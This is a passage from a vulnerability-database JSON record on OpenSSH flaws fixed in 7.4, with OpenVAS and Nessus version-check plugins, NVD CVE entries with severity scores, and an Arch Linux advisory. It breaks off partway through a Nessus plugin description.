"sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you 
can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2018.1069\");\n script_version(\"2020-01-23T11:11:39+0000\");\n script_cve_id(\"CVE-2016-10708\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:11:39 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:11:39 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for openssh (EulerOS-SA-2018-1069)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP2\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2018-1069\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1069\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'openssh' package(s) announced via the EulerOS-SA-2018-1069 advisory.\");\n\n script_tag(name:\"vuldetect\", 
value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"sshd in OpenSSH before 7.4 allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via an out-of-sequence NEWKEYS message, as demonstrated by Honggfuzz, related to kex.c and packet.c.(CVE-2016-10708)\");\n\n script_tag(name:\"affected\", value:\"'openssh' package(s) on Huawei EulerOS V2.0SP2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh\", rpm:\"openssh~6.6.1p1~28.h15\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-askpass\", rpm:\"openssh-askpass~6.6.1p1~28.h15\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-clients\", rpm:\"openssh-clients~6.6.1p1~28.h15\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-keycat\", rpm:\"openssh-keycat~6.6.1p1~28.h15\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-server\", rpm:\"openssh-server~6.6.1p1~28.h15\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "cve": [{"lastseen": "2020-12-09T20:07:34", "description": "sshd in OpenSSH before 7.4 allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via an out-of-sequence NEWKEYS message, 
as demonstrated by Honggfuzz, related to kex.c and packet.c.", "edition": 9, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-01-21T22:29:00", "title": "CVE-2016-10708", "type": "cve", "cwe": ["CWE-476"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-10708"], "modified": "2019-06-26T08:15:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/a:netapp:oncommand_unified_manager:*", "cpe:/o:debian:debian_linux:8.0", "cpe:/a:netapp:cloud_backup:-", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/a:netapp:vasa_provider:-", "cpe:/a:netapp:service_processor:-", "cpe:/a:netapp:storagegrid_webscale:-", "cpe:/a:netapp:data_ontap_edge:-", "cpe:/o:debian:debian_linux:7.0", "cpe:/a:netapp:data_ontap:-", "cpe:/a:netapp:storagegrid:-", "cpe:/o:netapp:clustered_data_ontap:-", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "CVE-2016-10708", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-10708", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:service_processor:-:*:*:*:*:*:*:*", 
"cpe:2.3:a:netapp:data_ontap_edge:-:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:storagegrid_webscale:-:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:data_ontap:-:*:*:*:*:7-mode:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:a:netapp:storagegrid:-:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_unified_manager:*:*:*:*:*:vsphere:*:*", "cpe:2.3:a:netapp:vasa_provider:-:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:*:*:*:*", "cpe:2.3:o:netapp:clustered_data_ontap:-:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2020-12-09T20:07:33", "description": "authfile.c in sshd in OpenSSH before 7.4 does not properly consider the effects of realloc on buffer contents, which might allow local users to obtain sensitive private-key information by leveraging access to a privilege-separated child process.", "edition": 5, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-01-05T02:59:00", "title": "CVE-2016-10011", "type": "cve", "cwe": ["CWE-320"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2016-10011"], "modified": "2018-09-11T10:29:00", "cpe": ["cpe:/a:openbsd:openssh:7.3"], "id": "CVE-2016-10011", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-10011", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:openbsd:openssh:7.3:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:07:33", "description": "sshd in OpenSSH before 7.4, when privilege separation is not used, creates forwarded Unix-domain sockets as root, which might allow local users to gain privileges via unspecified vectors, related to serverloop.c.", "edition": 5, "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.0, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-01-05T02:59:00", "title": "CVE-2016-10010", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-10010"], "modified": "2018-06-01T01:29:00", "cpe": ["cpe:/a:openbsd:openssh:7.3"], "id": "CVE-2016-10010", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-10010", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:openbsd:openssh:7.3:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:07:33", "description": 
"Untrusted search path vulnerability in ssh-agent.c in ssh-agent in OpenSSH before 7.4 allows remote attackers to execute arbitrary local PKCS#11 modules by leveraging control over a forwarded agent-socket.", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "baseScore": 7.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.4}, "published": "2017-01-05T02:59:00", "title": "CVE-2016-10009", "type": "cve", "cwe": ["CWE-426"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-10009"], "modified": "2018-09-11T10:29:00", "cpe": ["cpe:/a:openbsd:openssh:7.3"], "id": "CVE-2016-10009", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-10009", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:openbsd:openssh:7.3:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:07:33", "description": "The shared memory manager (associated with pre-authentication compression) in sshd in OpenSSH before 7.4 does not ensure that a bounds check is enforced by all compilers, which might allows local users to gain privileges by leveraging access to a sandboxed privilege-separation process, related to the m_zback and m_zlib data structures.", "edition": 6, "cvss3": 
{"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-01-05T02:59:00", "title": "CVE-2016-10012", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-10012"], "modified": "2018-09-11T10:29:00", "cpe": ["cpe:/a:openbsd:openssh:7.3"], "id": "CVE-2016-10012", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-10012", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:openbsd:openssh:7.3:*:*:*:*:*:*:*"]}], "archlinux": [{"lastseen": "2020-09-22T18:36:44", "bulletinFamily": "unix", "cvelist": ["CVE-2016-10009", "CVE-2016-10010", "CVE-2016-10011", "CVE-2016-10012"], "description": "Arch Linux Security Advisory ASA-201612-20\n==========================================\n\nSeverity: Medium\nDate : 2016-12-22\nCVE-ID : CVE-2016-10009 CVE-2016-10010 CVE-2016-10011 CVE-2016-10012\nPackage : openssh\nType : multiple issues\nRemote : Yes\nLink : https://security.archlinux.org/AVG-110\n\nSummary\n=======\n\nThe package openssh before version 7.4p1-1 is vulnerable to multiple\nissues including arbitrary code execution, privilege escalation,\ninformation disclosure and 
insufficient validation.\n\nResolution\n==========\n\nUpgrade to 7.4p1-1.\n\n# pacman -Syu \"openssh>=7.4p1-1\"\n\nThe problems have been fixed upstream in version 7.4p1.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2016-10009 (arbitrary code execution)\n\nIt was found that ssh-agent could load PKCS#11 modules from paths\noutside of a trusted whitelist. An attacker able to load a crafted\nPKCS#11 module across a forwarded agent channel could potentially use\nthis flaw to execute arbitrary code on the system running the ssh-\nagent. Note that the attacker must have control of the forwarded agent-\nsocket and the ability to write to the filesystem of the host running\nssh-agent.\n\n- CVE-2016-10010 (privilege escalation)\n\nIt was found that when privilege separation was disabled in OpenSSH,\nforwarded Unix-domain sockets would be created by sshd with root\nprivileges instead of the privileges of the authenticated user. This\ncould allow an authenticated attacker to potentially gain root\nprivileges on the host system.\nPrivilege separation has been enabled by default since OpenSSH\n3.3/3.3p1 (2002-06-21). Thus, OpenSSH is not affected by default. An\naffected OpenSSH configuration would have to specifically disable\nprivilege separation with the \"UsePrivilegeSeparation no\" configuration\ndirective in /etc/ssh/sshd_config.\n\n- CVE-2016-10011 (information disclosure)\n\nIt was found that there is a theoretical leak of host private key\nmaterial to privilege-separated child processes via realloc() when\nreading keys. No such leak was observed in practice for normal-sized\nkeys, nor does a leak to the child processes directly expose key\nmaterial to unprivileged users.\n\n- CVE-2016-10012 (insufficient validation)\n\nIt was found that the shared memory manager used by pre-authentication\ncompression support had a bounds check that could be elided by some\noptimizing compilers. 
Additionally, this memory manager was incorrectly\naccessible when pre-authentication compression was disabled. This could\npotentially allow attacks against the privileged monitor process from\nthe sandboxed privilege-separation process (a compromise of the latter\nwould be required first).\n\nImpact\n======\n\nA remote attacker may be able to perform attacks against the shared\nmemory manager used by pre-authentication compression support.\nFurthermore a local attacker may be able to execute arbitrary code and\ndisclose sensitive information under certain circumstances or possibly\nescalate privileges when having privilege separation explicitly\ndisabled.\n\nReferences\n==========\n\nhttps://www.openssh.com/txt/release-7.4\nhttp://seclists.org/oss-sec/2016/q4/708\nhttp://seclists.org/oss-sec/2016/q4/705\nhttps://access.redhat.com/security/cve/CVE-2016-10009\nhttps://access.redhat.com/security/cve/CVE-2016-10010\nhttps://access.redhat.com/security/cve/CVE-2016-10011\nhttps://access.redhat.com/security/cve/CVE-2016-10012", "modified": "2016-12-22T00:00:00", "published": "2016-12-22T00:00:00", "id": "ASA-201612-20", "href": "https://security.archlinux.org/ASA-201612-20", "type": "archlinux", "title": "[ASA-201612-20] openssh: multiple issues", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-01T01:10:15", "description": "New openssh packages are available for Slackware 13.0, 13.1, 13.37,\n14.0, 14.1, 14.2, and -current to fix security issues.", "edition": 23, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-12-27T00:00:00", "title": "Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / 14.2 / current : openssh (SSA:2016-358-02)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10011", "CVE-2016-10009", "CVE-2016-10010", "CVE-2016-10012"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:14.2", 
"cpe:/o:slackware:slackware_linux:14.1", "cpe:/o:slackware:slackware_linux:13.37", "p-cpe:/a:slackware:slackware_linux:openssh", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:slackware:slackware_linux:13.0", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:13.1"], "id": "SLACKWARE_SSA_2016-358-02.NASL", "href": "https://www.tenable.com/plugins/nessus/96091", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2016-358-02. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(96091);\n script_version(\"3.3\");\n script_cvs_date(\"Date: 2019/04/11 17:23:07\");\n\n script_cve_id(\"CVE-2016-10009\", \"CVE-2016-10010\", \"CVE-2016-10011\", \"CVE-2016-10012\");\n script_xref(name:\"SSA\", value:\"2016-358-02\");\n\n script_name(english:\"Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / 14.2 / current : openssh (SSA:2016-358-02)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New openssh packages are available for Slackware 13.0, 13.1, 13.37,\n14.0, 14.1, 14.2, and -current to fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.647637\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?af8be5f5\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssh package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n 
script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"13.0\", pkgname:\"openssh\", pkgver:\"7.4p1\", pkgarch:\"i486\", pkgnum:\"1_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"openssh\", pkgver:\"7.4p1\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.0\")) flag++;\n\nif (slackware_check(osver:\"13.1\", pkgname:\"openssh\", pkgver:\"7.4p1\", pkgarch:\"i486\", pkgnum:\"1_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"openssh\", pkgver:\"7.4p1\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.1\")) flag++;\n\nif (slackware_check(osver:\"13.37\", pkgname:\"openssh\", pkgver:\"7.4p1\", pkgarch:\"i486\", pkgnum:\"1_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"openssh\", pkgver:\"7.4p1\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.37\")) flag++;\n\nif (slackware_check(osver:\"14.0\", pkgname:\"openssh\", pkgver:\"7.4p1\", pkgarch:\"i486\", pkgnum:\"1_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"openssh\", pkgver:\"7.4p1\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"openssh\", 
pkgver:\"7.4p1\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"openssh\", pkgver:\"7.4p1\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"14.2\", pkgname:\"openssh\", pkgver:\"7.4p1\", pkgarch:\"i586\", pkgnum:\"1_slack14.2\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"openssh\", pkgver:\"7.4p1\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"openssh\", pkgver:\"7.4p1\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"openssh\", pkgver:\"7.4p1\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T04:32:54", "description": "According to its banner, the version of OpenSSH running on the remote\nhost is prior to 7.4. It is, therefore, affected by multiple\nvulnerabilities :\n\n - A flaw exists in ssh-agent due to loading PKCS#11\n modules from paths that are outside a trusted whitelist.\n A local attacker can exploit this, by using a crafted\n request to load hostile modules via agent forwarding, to\n execute arbitrary code. To exploit this vulnerability,\n the attacker would need to control the forwarded\n agent-socket (on the host running the sshd server) and\n the ability to write to the file system of the host\n running ssh-agent. (CVE-2016-10009)\n\n - A flaw exists in sshd due to creating forwarded\n Unix-domain sockets with 'root' privileges whenever\n privilege separation is disabled. 
A local attacker can\n exploit this to gain elevated privileges.\n (CVE-2016-10010)\n\n - An information disclosure vulnerability exists in sshd\n within the realloc() function due to leakage of key\n material to privilege-separated child processes when\n reading keys. A local attacker can possibly exploit this\n to disclose sensitive key material. Note that no such\n leak has been observed in practice for normal-sized\n keys, nor does a leak to the child processes directly\n expose key material to unprivileged users.\n (CVE-2016-10011)\n\n - A flaw exists in sshd within the shared memory manager\n used by pre-authenticating compression support due to a\n bounds check being elided by some optimizing compilers\n and due to the memory manager being incorrectly\n accessible when pre-authenticating compression is\n disabled. A local attacker can exploit this to gain\n elevated privileges. (CVE-2016-10012)\n\n - A denial of service vulnerability exists in sshd when\n handling KEXINIT messages. An unauthenticated, remote\n attacker can exploit this, by sending multiple KEXINIT\n messages, to consume up to 128MB per connection.\n\n - A flaw exists in sshd due to improper validation of\n address ranges by the AllowUsers and DenyUsers\n directives at configuration load time. 
A local attacker\n can exploit this, via an invalid CIDR address range, to\n gain access to restricted areas.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 29, "cvss3": {"score": 7.3, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"}, "published": "2016-12-27T00:00:00", "title": "OpenSSH < 7.4 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10011", "CVE-2016-10009", "CVE-2016-10010", "CVE-2016-10012"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:openbsd:openssh"], "id": "OPENSSH_74.NASL", "href": "https://www.tenable.com/plugins/nessus/96151", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(96151);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/02/26 4:50:08\");\n\n script_cve_id(\n \"CVE-2016-10009\",\n \"CVE-2016-10010\",\n \"CVE-2016-10011\",\n \"CVE-2016-10012\"\n );\n script_bugtraq_id(\n 94968,\n 94972,\n 94975,\n 94977\n );\n script_xref(name:\"EDB-ID\", value:\"40962\");\n\n script_name(english:\"OpenSSH < 7.4 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the OpenSSH banner version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The SSH server running on the remote host is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of OpenSSH running on the remote\nhost is prior to 7.4. It is, therefore, affected by multiple\nvulnerabilities :\n\n - A flaw exists in ssh-agent due to loading PKCS#11\n modules from paths that are outside a trusted whitelist.\n A local attacker can exploit this, by using a crafted\n request to load hostile modules via agent forwarding, to\n execute arbitrary code. 
To exploit this vulnerability,\n the attacker would need to control the forwarded\n agent-socket (on the host running the sshd server) and\n the ability to write to the file system of the host\n running ssh-agent. (CVE-2016-10009)\n\n - A flaw exists in sshd due to creating forwarded\n Unix-domain sockets with 'root' privileges whenever\n privilege separation is disabled. A local attacker can\n exploit this to gain elevated privileges.\n (CVE-2016-10010)\n\n - An information disclosure vulnerability exists in sshd\n within the realloc() function due to leakage of key\n material to privilege-separated child processes when\n reading keys. A local attacker can possibly exploit this\n to disclose sensitive key material. Note that no such\n leak has been observed in practice for normal-sized\n keys, nor does a leak to the child processes directly\n expose key material to unprivileged users.\n (CVE-2016-10011)\n\n - A flaw exists in sshd within the shared memory manager\n used by pre-authenticating compression support due to a\n bounds check being elided by some optimizing compilers\n and due to 